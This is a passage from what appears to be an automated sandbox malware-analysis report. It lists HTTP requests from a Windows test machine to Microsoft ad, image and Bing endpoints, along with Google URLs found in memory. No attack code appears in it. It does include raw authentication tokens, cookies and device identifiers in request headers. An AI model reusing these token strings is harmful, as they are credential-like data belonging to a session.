dra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: dI8PgNjo+ke0xboL.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225230Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6db5913ae0134561b048b700e0a37ba0&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338388&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: dI8PgNjo+ke0xboL.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225258Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=28ab033466cc44188ab2f1189793a356&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338389&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: dI8PgNjo+ke0xboL.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225302Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=cec3223855544d519fc2c34693672524&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-280815&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: dI8PgNjo+ke0xboL.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWP0UC?ver=2f44 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWEJpy?ver=6047 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWEtem?ver=77f0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWP8kk?ver=8c62 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWyRpm?ver=4e05 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWyTNu?ver=6011 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225342Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=dc9b39fc0d0148e1b1e02d04ebe466b4&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513699&metered=false&nettype=ethernet&npid=sc-310091&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513699&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: YQVwk7f/Y06mdShO.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225401Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b69f9e6792c34f1c91801a094f11b7c2&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513699&metered=false&nettype=ethernet&npid=sc-310091&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513699&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: pod=3&chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=Cache-Control: no-cacheMS-CV: YQVwk7f/Y06mdShO.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 May 2022 13:50:55 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: 1ab063b0-0b11-4bdb-b1d1-979be8ed357e.tmp.1.dr, be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, efd2cc8f-d662-4a18-8425-a1c45d4ccfa2.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://dns.google
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://r2---sn-1gi7znes.gvt1.com
Source: 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -480X-BM-FirstEnabledTime: 132061340710069592X-DeviceID: 0100748C0900F045X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; StandardBias=0; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAdtELABKVRi0uEZqpkvZbEYkgCvJB4SlUfBnFRmD2KbN3pYTZ28SZF3VNMC3H20cdPTEy2p%2BLxiokgGMXunV8kWIXJeaxZdAzzuLUHW9j7/E01vJTqZufRse9f0y0F2saK3S9AHyXdqq378ixTPKVxSNJGlzn785FXCK6mRKuw7k5bxtdBrCsDUE99ZyvTyb59kNDAmtTgDhxY6EFFNUrpcHigwXFU0swLaZ3p8Ur9sRSgk6V6vnhVp%2BuOSTpcLTmggVSafY8OW%2BUAy8JE1vXokpbovFsfOOvRC0mZQsNhIPLtX861igqUCu69prtGW1qPN6UT/Ie/sT4sJE5hoUEEIDZgAACH3hEDfIurMMqAFNBoRMccrdW4NegFr%2BjoQfwEgjauLdrInkR0E5mNwDLJJ4KrYiCzYHUs4vN3WDqcNDfi0ul0h0%2BVN5jMZGPZkNw1r76tQoVw76zdWNOlrCwJavDq/cb7v7hsC3p6zp2MJqFZmYjbFX5ArphKpkV19yct%2B9VDzq65T/69JvN2lwXDTpMcppJUerEIAncVj2Qd3tUof1IggbI6nCdCVtQdw%2BwwHgATyUH1V3AahlQW5kH1V/II6GXqnYGlLCmjaLoJmw7mjSFeL2LFy3kVLqEahtNEbpQypCxV4jgjkNj5zOI76CKXiz41iXZOSrb7nsMouncSMeWksuh46eWHQnc00dBa5XYuD465TvBLvilWYUtETg5XSqlNpD7VkYVtboZWTW1crzmJqlEcSvdp4Qt2tWKUFs1ymqjWhBwSOnkMtPNjh64YfB%2BVNUwSGgta/0z5oJH1MUIJgsdlVPpDkXfP0HcyZrCIK6/dZ/%2BlXIsSV6SLjCfsHYFEGJa6IljmOmuAR9gQtSRkl7rP/3uarCsqJOCuY0ZSf1l4G3q/3U%2Bf3rB7IxbJ1ViRQy1AE%3D%26p%3DX-Agent-DeviceId: 0100748C0900F045X-BM-CBT: 1646756872X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: 56B0FB09C5A844A3BFAD59583E571607X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 85683Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1652482231077&AC=1&CPH=4ef661f2
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49772 version: TLS 1.2
